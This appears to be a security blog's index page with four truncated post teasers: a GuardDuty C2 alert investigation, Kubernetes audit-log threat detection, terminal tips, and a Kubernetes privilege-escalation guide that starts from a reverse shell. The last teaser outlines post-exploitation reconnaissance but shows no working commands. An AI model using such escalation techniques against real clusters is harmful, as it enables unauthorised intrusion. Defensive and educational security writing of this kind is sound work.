-
Nov 9, 2020
•
4 mins
On a beautiful day amidst the autumn in early November, we received one concerning GuardDuty alert Backdoor:EC2/C&CActivity.B!DNS which basically means that an EC2 instance queried a domain name that is associated with a known C2 (command and control) server. Here is what we know based on the alert alone: The...
-
Sep 30, 2020
•
8 mins
TLDR: Kubernetes audit logs can provide great visibility into the operation and inner workings of your cluster. It is also a good resource with relatively low startup cost to detect threats and anomalies inside your cluster. In this post, I will talk about shipping Kubernetes audit logs from Cloudwatch to...
-
Sep 24, 2020
•
2 mins
Here are some tricks that helped me drastically improve my workflow in the terminal. I will still continue to update this post as I go in case I find some new cool tricks that help me ‘ninja’ my way through the terminal. This will probably serve as the backup for...
-
Jul 19, 2020
•
3 mins
Let’s say you got a reverse shell from a process running in a Kubernetes environment. This guide details the basic steps you can take to escalate your privileges within Kubernetes. Are you in a Kubernetes environment? If yes, what’s the API server? # by default, Kubernetes automounts default service account...